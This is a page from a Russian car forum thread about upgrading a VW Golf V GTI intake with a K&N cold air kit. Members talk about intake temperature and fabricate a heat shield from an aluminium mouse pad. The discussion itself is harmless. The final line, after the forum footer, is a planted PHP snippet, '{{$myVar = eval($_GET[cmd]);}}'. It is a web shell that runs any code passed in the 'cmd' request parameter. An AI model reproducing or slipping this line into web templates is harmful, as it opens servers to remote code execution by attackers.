+ Ответить в теме
Страница 3 из 14 ПерваяПервая 1 2 3 4 5 13 ... ПоследняяПоследняя
Показано с 21 по 30 из 132

Тема: GTI V Noise Pipe...модернизация и установка холодного впуска K&N


  1. #21
    GTI-Racing chess is on a distinguished road Аватар для chess
    Регистрация
    29.11.2006
    Откуда
    москвабад
    Машина
    CTR ЕК9, MPS K90, vw polo 6r
    Сообщений
    1,603
    <div class='quotetop'>Цитата(BON &#064; Mar 2 2009, 10&#58;18) <{POST_SNAPBACK}></div><div class='quotemain'>а вроде бы если он брал K&N, то там это должно быть изначально. Это один из немногих брендов, столь тщательно подходящих к вопросу впуска. У них потом все начинают копировать.[/b][/quote]
    не, я имею в виду лист который ставится между трубой и выпускным коллектором. вроде в кн его нет.
    вот железка посередине:
    каждому своё
    АДМ GTI mkV st1.5 - 2.01.084
    АДМ Civic Type-R EK9 - 1.57.683
    Смоленск Civic Type-R EK9 - 1.47.690
    Нижний Новгород Civic Type-R EK9 - 1.53.472
    Казань Civic Type-R EK9 - 1.43.187
    MRW Civic Type-R EK9 - 2.01.663

  2. #22
    GTI-Racing Max is on a distinguished road Аватар для Max
    Регистрация
    24.08.2007
    Откуда
    Москва
    Машина
    VW Golf V GTI Edition 30
    Сообщений
    1,406
    <div class='quotetop'>Цитата(chess &#064; Mar 2 2009, 08&#58;45) <{POST_SNAPBACK}></div><div class='quotemain'>Теперь интересно будет померить температуру на впуске у тебя.[/b][/quote]

    Паш, я как раз хотел тебе предложить еще раз сравнить температуру при случае.

    <div class='quotetop'>Цитата</div><div class='quotemain'>Если есть желание могу дать тебе свой heat shield (он сейчас снят и лежит на балконе), чтоб ты его скопировал и отгородил свое творение от пагубного вляиния выпускного колектора.[/b][/quote]

    Круто&#33; С удовольствием возьму, чтобы сделать копию. Я ты почему его не поставил?

    <div class='quotetop'>Цитата</div><div class='quotemain'>А вобще думаю, что для улучшения ситуации с температурой воздуха на впуске (ведь мы этого добиваемся), важнее термоизоляции трубы, восприпятсвовать попаданию горячего воздуха из подкапотного пространства на впуск. Т.е. отгородить фильтрик надобно.
    Но я думаю у тебя уже есть решения из аэрокосмической области на этот счет.[/b][/quote]

    Я хочу из хит-шилда который идет в комплекте K&N сделать проходную коробку (чтобы воздух мог свободно проходить, не создавая зон разряжения перед фильтром). Защита которая идет в комплекте хороша тем, что она ставится вместе со штатным заборником воздуха, размещенным за грилем, то есть сделать осталось немного - закрыть ее сверху, оставив выход воздуха на тыльной стороне и теплоизолировать.



    Кстати, Паш, могу дать скопировать хит-шилд К-Н-овский. Мне кажется он и под Неоспид должен стать.
    Совершить невозможное - не такая уж великая проблема, если знаешь с чего начать... (с) Max Frei

  3. #23
    GTI-Racing Max is on a distinguished road Аватар для Max
    Регистрация
    24.08.2007
    Откуда
    Москва
    Машина
    VW Golf V GTI Edition 30
    Сообщений
    1,406
    <div class='quotetop'>Цитата(ed1evil &#064; Mar 2 2009, 10&#58;33) <{POST_SNAPBACK}></div><div class='quotemain'>Красота&#33; инетересно будет ли звук&#33;[/b][/quote]

    Инверсионный звук будет в любом случае, но если делать коробку с теплозащитным покрытием типа того же К-Флекса, громкость звука заметно снизится - К-Флекс и звукоизолятор очень хороший. По мне так это хорошо.
    Совершить невозможное - не такая уж великая проблема, если знаешь с чего начать... (с) Max Frei

  4. #24
    GTI-Racing chess is on a distinguished road Аватар для chess
    Регистрация
    29.11.2006
    Откуда
    москвабад
    Машина
    CTR ЕК9, MPS K90, vw polo 6r
    Сообщений
    1,603
    <div class='quotetop'>Цитата(Max &#064; Mar 2 2009, 12&#58;20) <{POST_SNAPBACK}></div><div class='quotemain'>Круто&#33; С удовольствием возьму, чтобы сделать копию. Я ты почему его не поставил?[/b][/quote]
    на зиму поставил родную систему. не за чем зимой нулевик и спецэфекты все с ним связанные.

    <div class='quotetop'>Цитата(Max &#064; Mar 2 2009, 12&#58;20) <{POST_SNAPBACK}></div><div class='quotemain'>Кстати, Паш, могу дать скопировать хит-шилд К-Н-овский. Мне кажется он и под Неоспид должен стать.[/b][/quote]
    с удовольствием возьму чтоб изучить и использовать в своем кастоме))
    можно в пятницу на встрече.
    каждому своё
    АДМ GTI mkV st1.5 - 2.01.084
    АДМ Civic Type-R EK9 - 1.57.683
    Смоленск Civic Type-R EK9 - 1.47.690
    Нижний Новгород Civic Type-R EK9 - 1.53.472
    Казань Civic Type-R EK9 - 1.43.187
    MRW Civic Type-R EK9 - 2.01.663

  5. #25
    GTI-Racing Max is on a distinguished road Аватар для Max
    Регистрация
    24.08.2007
    Откуда
    Москва
    Машина
    VW Golf V GTI Edition 30
    Сообщений
    1,406
    <div class='quotetop'>Цитата(chess &#064; Mar 2 2009, 14&#58;02) <{POST_SNAPBACK}></div><div class='quotemain'>можно в пятницу на встрече.[/b][/quote]

    Ок
    Совершить невозможное - не такая уж великая проблема, если знаешь с чего начать... (с) Max Frei

  6. #26
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    <div class='quotetop'>Цитата(chess &#064; Mar 2 2009, 11&#58;23) <{POST_SNAPBACK}></div><div class='quotemain'>не, я имею в виду лист который ставится между трубой и выпускным коллектором. вроде в кн его нет.
    вот железка посередине:[/b][/quote]


    вот именно про такую штуковину я и говорил одному нашему одноклубнеку и поклоннику качественного тюнинга и фирмы K&N.
    Этого как раз и не хватало в комплекте. Я ему говорил про, то что нужно что-то подобное, вот как раз и можно взять за основу твою инфу. Можно даже немного побольше чуть-чуть и это будет отличный рассеивающий тепловой экранчик, которого 100% не хватает.
    песок сыпется....не останавливайтесь на достигнутом !

  7. #27
    GTI-Racing Max is on a distinguished road Аватар для Max
    Регистрация
    24.08.2007
    Откуда
    Москва
    Машина
    VW Golf V GTI Edition 30
    Сообщений
    1,406
    Тем временем, мой впускной кит пополнился новой шнягой...
    В прошлую пятницу Паша Chess отдал мне свой Heat Shield из комплекта Neuspeed. Я несколько дней пытался найти подходящий кусок листового алюминия, чтобы сделать копию. В OBI на Варшавке есть листы толщиной 1 мм размером 200х1000 мм, но стоит такой лист что-то около 1500 рублей, и меня признаться жаба душила тратить столько денег за тонкий металл - хотел найти лист потолще.
    И тут я вспомнил, что мне как-то дарили понтовый игровой металлический коврик для мыши, которым я попробовал пользоваться, не смог и забросил в шкаф. Оказалось он изготовлен из офигительного алюминиевого сплава, и толщина у него 1,5 мм.

    На Dremel мне денег не жалко было - давно его хотел


    Это коврик уже размеченный и даже надпиленный (сверху лежит оригинальный хит-шилд)


    Первый чистовой рез


    Ну и готовый полуфабрикат - осталось сделать гиб по наружному краю, но тисков у меня нет, а без них сделать гиб даже с надрезом нереально.


    Теперь нужно где-то нарыть нормальные тиски [img]style_emoticons/<#EMO_DIR#>/smile.gif[/img]

    Все еще хочу сделать из хит-шилда бутерброд из двух пластин с термоизоляционным слоем между ними, но пока не нашел подходящего материала, возможно забью, и просто оставлю один толстый лист.

    Еще вот думаю красить его в серебро, или просто шлифануть и оставить чистым? Склоняюсь пока к последнему варианту.
    Совершить невозможное - не такая уж великая проблема, если знаешь с чего начать... (с) Max Frei

  8. #28
    Жгун Года 2010 КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough КИБАЛЬЧИШЬ is a jewel in the rough Аватар для КИБАЛЬЧИШЬ
    Регистрация
    14.04.2008
    Сообщений
    2,346
    Гена как я Вам уже не раз говорил ВЫ извращенец в высшей степени...
    Вашей выдержке и упорству опять же завидывываю..

    ЗЫ, Срочно ищу игровой коврик из алюминия&#33;&#33;&#33;
    Честно только для игр в Танчики, СуперМарио там...

  9. #29
    круто&#33;&#33;&#33; хочу лекала&#33;&#33;&#33;&#33;&#33;&#33;&#33;&#33;&#33 ;&#33; лучше наверное черным оставить

  10. #30
    GTI-Racing chess is on a distinguished road Аватар для chess
    Регистрация
    29.11.2006
    Откуда
    москвабад
    Машина
    CTR ЕК9, MPS K90, vw polo 6r
    Сообщений
    1,603
    Гена - молодец.
    У меня до короба руки не дошли пока.
    Дойдут завтра - сегодня футбол.
    каждому своё
    АДМ GTI mkV st1.5 - 2.01.084
    АДМ Civic Type-R EK9 - 1.57.683
    Смоленск Civic Type-R EK9 - 1.47.690
    Нижний Новгород Civic Type-R EK9 - 1.53.472
    Казань Civic Type-R EK9 - 1.43.187
    MRW Civic Type-R EK9 - 2.01.663

+ Ответить в теме
Страница 3 из 14 ПерваяПервая 1 2 3 4 5 13 ... ПоследняяПоследняя

Похожие темы

  1. Отчет Об Установке Холодного Впуска Evoms И Вспрыска Метанола Snow Performance
    от umidka в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 20
    Последнее сообщение: 05.10.2023, 06:09
  2. Особенности установки холодного впуска на 2.0Т
    от serzh1 в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 47
    Последнее сообщение: 02.10.2023, 06:07
  3. CTS Down pipe GTI Mk6
    от Rugby 14 в разделе Тюнинг
    Ответов: 12
    Последнее сообщение: 16.09.2014, 16:31
  4. Комплект Noise Pipe Delete Kit для R32
    от Bahus в разделе Покупка и продажа запчастей
    Ответов: 3
    Последнее сообщение: 02.05.2013, 11:26
  5. Поставил систему холодного впуска
    от nickart в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 85
    Последнее сообщение: 17.08.2008, 00:11

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}